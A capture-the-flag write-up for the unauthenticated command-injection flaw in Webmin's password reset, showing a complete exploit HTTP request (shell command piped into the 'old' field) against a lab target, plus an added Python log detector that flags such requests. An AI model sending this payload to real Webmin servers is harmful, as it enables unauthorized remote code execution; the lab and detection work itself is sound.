墨者学院 - Webmin Unauthenticated Remote Code Execution
2022-07-04 07:40:00 [Lyswbb]
After obtaining the lab target, browse to it; you land on a login page.

From the challenge description we know this is an unauthenticated RCE, so the first step is to look up the historical CVE number (CVE-2019-15107). Once found, reproduce the vulnerability directly. The vulnerable spot is in the password reset feature: Webmin -> Webmin Configuration -> Authentication.

Capture the traffic with Burp and modify the parameters. Note that session_login.cgi must be changed to password_change.cgi; the parameters below can be copied as they are. Triggering this vulnerability only requires passing an expired parameter and executing the command.

```http
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
```
Then simply read key.txt under the root directory to get the flag.
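From the defender's side, the request above has a clear signature: a POST to password_change.cgi that sets `expired` and carries shell metacharacters in `old`. The following is an added detection example (not from the original post or from Webmin itself) that parses constructed, simplified access-log lines in a `method path status body` format and flags such requests; the log format, the `SAMPLE_LOG` entries and the field names chosen for inspection are assumptions for this illustration. Upgrading to a patched Webmin release and disabling the "expired password change" option remain the actual fix.

```python
"""Flag CVE-2019-15107-style requests to Webmin's password_change.cgi."""
import re
from urllib.parse import parse_qs

# Constructed sample log (assumed format: "METHOD PATH STATUS URLENCODED_BODY").
SAMPLE_LOG = """\
POST /session_login.cgi 302 user=admin&pass=secret
POST /password_change.cgi 200 user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
POST /password_change.cgi 200 user=alice&pam=&expired=1&old=oldpw&new1=newpw&new2=newpw
POST /password_change.cgi 200 user=bob&pam=&expired=2&old=x%3Bid&new1=a&new2=a
"""

SHELL_META = re.compile(r"[|;&`$]")        # characters that reach a shell unquoted
SUSPICIOUS_FIELDS = ("old", "expired")     # fields inspected (assumption)


def analyze_line(line):
    """Return a finding dict for a suspicious password_change.cgi POST, else None."""
    try:
        method, path, _status, body = line.split(" ", 3)
    except ValueError:
        return None                        # malformed line, not our format
    if method != "POST" or not path.endswith("/password_change.cgi"):
        return None
    params = parse_qs(body, keep_blank_values=True)
    if "expired" not in params:            # vulnerable code path needs 'expired' set
        return None
    hits = [f for f in SUSPICIOUS_FIELDS
            if any(SHELL_META.search(v) for v in params.get(f, []))]
    if not hits:
        return None                        # legitimate expired-password change
    return {"user": params.get("user", [""])[0],
            "fields": hits,
            "old": params.get("old", [""])[0]}


def scan(log_text):
    """Run analyze_line over every line and keep only the findings."""
    return [r for r in (analyze_line(l) for l in log_text.splitlines()) if r]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("ALERT possible CVE-2019-15107 attempt:", finding)
```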
